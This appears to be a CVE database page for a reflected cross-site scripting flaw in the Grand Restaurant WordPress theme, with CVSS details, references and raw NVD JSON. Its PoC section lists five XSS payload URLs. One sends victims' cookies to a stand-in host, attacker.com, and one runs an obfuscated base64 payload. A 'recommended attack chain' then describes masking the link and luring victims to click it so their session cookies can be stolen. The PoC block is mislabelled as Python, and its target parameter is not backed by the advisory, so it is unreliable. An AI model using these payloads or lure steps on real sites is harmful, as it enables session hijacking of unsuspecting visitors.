CVE-2025-67922

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS.This issue affects Grand Restaurant: from n/a through < 7.0.9.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:themegoods:grand_restaurant:*:*:*:*:*:wordpress:*:* - VULNERABLE

Grand Restaurant主题 < 7.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-67922 PoC - Reflected XSS in Grand Restaurant Theme -->
<!-- Target: WordPress sites using Grand Restaurant theme < 7.0.9 -->
<!-- This PoC demonstrates a reflected XSS attack -->

<!-- Method 1: Using script tag -->
https://target-site.com/?s=<script>alert(document.cookie)</script>

<!-- Method 2: Using img onerror handler -->
https://target-site.com/?s=<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>

<!-- Method 3: Using SVG onload event -->
https://target-site.com/?s=<svg onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>

<!-- Method 4: Using anchor with javascript protocol -->
https://target-site.com/?s=<a href="javascript:alert(document.domain)">Click me</a>

<!-- Method 5: Using body onload event -->
https://target-site.com/?s=<body onload=alert('XSS')>

<!-- Recommended attack chain: -->
1. Attacker creates a shortened/masked URL using URL shortener or email
2. Lures victim to click the malicious link
3. Victim's browser executes the injected JavaScript
4. Attacker steals session cookies or performs actions on behalf of victim

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67922
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67922
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67922/
[4] VulDB https://vuldb.com/cve/CVE-2025-67922
[5] https://patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67922", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:51.220", "lastModified": "2026-04-27T18:16:49.330", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS.This issue affects Grand Restaurant: from n/a through < 7.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:themegoods:grand_restaurant:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "7.0.9", "matchCriteriaId": "B4D1C073-6B70-440B-A651-4CA5D3ED8AC6"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}